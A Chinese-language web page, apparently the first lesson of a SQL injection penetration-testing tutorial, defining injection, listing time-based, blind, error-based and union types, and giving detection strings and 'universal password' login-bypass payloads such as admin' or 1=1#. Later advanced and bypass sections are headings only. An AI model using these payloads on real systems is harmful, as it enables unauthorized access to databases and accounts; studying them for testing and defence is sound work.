WEB前端网站入侵渗透测试教程 --SQL注入系列教程

网络教程

SQL注入初级一

1.什么是SQL注入

用户提交的参数带入了SQL语句。


2.SQL注入都有哪些类型

分类:注入取数据方式不一样来分类,(按获取数据的速度排列)



1.延时注入

sleep(秒) if(true,sleep(1),0)

2.盲注(and 1=1 and 1=2)and hex(substr(data,1,1))>0

3.错误显示注入(利用数据库的错误消息来进行注入)

mysql(64个字符) group by x

oracle(大概2000个字符左右)xmltype

mssql(1前多还是2千多字符) 数字转换错误

4.union注入 union all select username from admin


3.SQL注入能干什么

1.获取数据库数据(曾删改查)

2.读写文件

3.执行操作系统命令


4.如何判断是否存在注入

数字型、字符型、搜索型


数字型:

sql="select * from news where id=1 and 1=1";

sql="select * from news where id=1 order by 1";

字符型:

1' and '1'='1

sql="select * from news where type='1' and '1'='1'";


sql="select * from news where type='1' order by 1'";

搜索型:

%' and '%'='

sql="select * from news where title like '%%'"


5.传说中的万能密码

admin' or 'a'='a

admin' or 1=1#(mysql)

admin' or 1=1--(sqlserver)

admin' or 1=1;--(sqlserver)


sql="select * from admin where username='' and password=''";



四、SQL注入的高级利用方式

1.MySQL

2.SQLServer


五、SQL注入绕过

1.数据提交方式绕过

2.其他方式




下载地址:点此下载



« 上一篇下一篇 »